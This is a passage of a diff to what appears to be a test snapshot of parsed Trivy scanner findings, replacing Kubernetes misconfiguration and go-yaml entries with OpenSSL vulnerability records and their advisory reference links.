"value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", - "foundIn": "Target: 'lurker' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-28948", - "installedVersion": "v3.0.0-20210107192922-496545a6307b", - "packageName": "gopkg.in/yaml.v3", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28948", - "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", - "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", - "https://github.com/go-yaml/yaml/issues/666", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", - "https://security.netapp.com/advisory/ntap-20220923-0006/", - "https://www.cve.org/CVERecord?id=CVE-2022-28948", - ], - }, - "category": "Vulnerability", - "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": undefined, - "name": "crash when attempting to deserialize invalid input", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28948", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28948", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/issues/666", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.requests.cpu')", + "category": "Vulnerability", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "X.400 address type confusion in X.509 GeneralName", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/2164440", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'lurker' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/2164492", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'lurker' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-public&Kind=Role&Name=system:controller:bootstrap-signer", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system:controller:bootstrap-signer' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system::leader-locking-kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-controller-manager", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-controller-manager' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system::leader-locking-kube-scheduler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-scheduler", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-scheduler' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:bootstrap-signer", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:cloud-provider' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:cloud-provider", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system:controller:cloud-provider' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:token-cleaner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": 